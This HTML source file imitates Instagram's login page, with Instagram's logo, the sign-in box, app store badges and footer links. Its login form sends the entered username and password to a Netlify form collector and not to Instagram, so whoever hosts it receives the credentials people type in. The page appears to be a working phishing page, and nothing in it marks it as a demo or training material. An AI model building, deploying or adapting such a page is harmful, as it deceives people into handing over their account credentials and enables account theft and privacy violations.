<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Login</title>
  <style>
    :root {
      --main-color: #0095f6;
      --text-color: #262626;
      --background-color: #fafafa;
      --border-color: #dbdbdb;
      --footer-text-color: #00376b;
      --background-image: url('https://www.transparenttextures.com/patterns/dark-denim.png');
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Arial', sans-serif;
      text-decoration: none;
      font-size: 14px;
      border: none;
    }

    body {
      background-color: var(--background-color);
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-image: var(--background-image);
      background-size: cover;
      background-repeat: no-repeat;
    }

    #content-container {
      width: 350px;
      background-color: #fff;
      border: 1px solid var(--border-color);
      border-radius: 4px;
      padding: 20px;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
    }

    .instagram-logo {
      width: 175px;
      display: block;
      margin: 0 auto 20px;
    }

    form {
      text-align: center;
    }

    input {
      width: 100%;
      margin: 8px 0;
      padding: 10px;
      border: 1px solid var(--border-color);
      border-radius: 4px;
      outline: none;
      font-size: 14px;
    }

    .login-button {
      width: 100%;
      margin-top: 10px;
      background-color: var(--main-color);
      color: #fff;
      font-weight: bold;
      padding: 10px;
      border-radius: 4px;
      cursor: pointer;
      transition: background-color 0.3s ease;
      font-size: 14px;
    }

    .login-button:hover {
      background-color: #0077b5;
    }

    .get-container {
      text-align: center;
      margin-top: 20px;
    }

    .appstore,
    .googleplay {
      width: 140px;
      height: 50px;
      margin: 0 5px;
    }

    .footer {
      text-align: center;
      margin-top: 20px;
      font-size: 12px;
      color: #8e8e8e;
    }

    .links-list {
      list-style-type: none;
      padding: 0;
    }

    .links-list li {
      display: inline-block;
      margin-right: 10px;
    }

    .links-list li a {
      color: var(--footer-text-color);
      text-decoration: none;
    }

    .footer-span {
      display: block;
      margin-top: 10px;
    }

    @keyframes animation {
      0% {
        opacity: 0;
      }

      5% {
        opacity: 1;
      }

      20% {
        opacity: 1;
      }

      25% {
        opacity: 0;
      }

      100% {
        opacity: 0;
      }
    }
    .hidden{
      display:none;
    }
  </style>
</head>

<body>
  <div id="content-container">
    <img class="instagram-logo"
      src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Instagram_icon.png/2048px-Instagram_icon.png"
      alt="Instagram Logo">
    <form id="login-form" name="contact" method="POST" data-netlify="true">
      <input type="hidden" name="form-name" value="contact" />
      <input type="text" id="username" name="username" placeholder="Phone number, username or email" required>
      <input type="password" id="password" name="password" placeholder="Password" required>
      <button type="submit" class="login-button">Log In</button>
    </form>
    <div class="get-container">
      <a href="#" class="signup">Don't have an account? Sign up</a>
      <div>
        <img class="appstore"
          src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Download_on_the_App_Store_Badge.svg/512px-Download_on_the_App_Store_Badge.svg.png"
          alt="Download on the App Store">
        <img class="googleplay"
          src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/78/Google_Play_Store_badge_EN.svg/512px-Google_Play_Store_badge_EN.svg.png"
          alt="Get it on Google Play">
      </div>
    </div>
    <footer class="footer">
      <ul class="links-list">
        <li><a href="#">About</a></li>
        <li><a href="#">Press</a></li>
        <li><a href="#">API</a></li>
        <li><a href="#">Jobs</a></li>
        <li><a href="#">Privacy</a></li>
        <li><a href="#">Terms</a></li>
        <li><a href="#">Locations</a></li>
        <li><a href="#">Top Accounts</a></li>
        <li><a href="#">Hashtags</a></li>
        <li><a href="#">Language</a></li>
      </ul>
      <span class="footer-span">© 2024 INSTAGRAM</span>
    </footer>
  </div>
</body>
</html>
